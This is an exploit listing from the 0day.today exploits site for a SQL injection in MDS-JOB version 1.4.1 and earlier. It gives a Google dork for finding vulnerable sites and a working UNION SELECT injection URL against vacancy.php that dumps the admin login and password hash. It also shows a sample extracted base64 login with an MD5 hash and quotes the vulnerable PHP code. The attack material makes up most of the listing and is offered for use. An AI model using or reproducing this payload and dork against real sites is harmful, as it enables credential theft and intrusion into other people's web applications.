[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MDS-JOB version <= 1.4.1 SQL-injection

Author
Ereee
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17504
Category
web applications
Date add
02-01-2012
Platform
php
# Exploit Title: MDS-JOB version <= 1.4.1 SQL-injection
# Date: 02.01.2012
# Author: Ereee
# Version: <=1.4.1
# Category:: [remote, webapps]
# Google dork: inurl:"vacancy.php?id=1"
# Tested in: web

Query:
http://localhost/[PATH]/vacancy.php?id=-1'+union+select+1,2,concat(login_admin,0x3a,pass_a dmin)+from+job_admin--+f
Result:
RnJvbnQ3Nzc=:0b70a123d1acb7edc7ab56ea86b91525
[login_in_base64:password_in_md5]

Vulnerable code in vacancy.php
########################################
if (isset($_GET['id']))
{
$id = ClearDataFromForm($_GET['id']);
$query_r = "SELECT name_razdel FROM $razdel_t WHERE id_razdel = '$id'";
$result_r = mysql_query($query_r);
$line_r = mysql_fetch_assoc($result_r);
$name_razdel = $line_r['name_razdel'];
########################################

Greetz to : forum.antichat.ru&rdot.org members



#  0day.today [2024-12-24]  #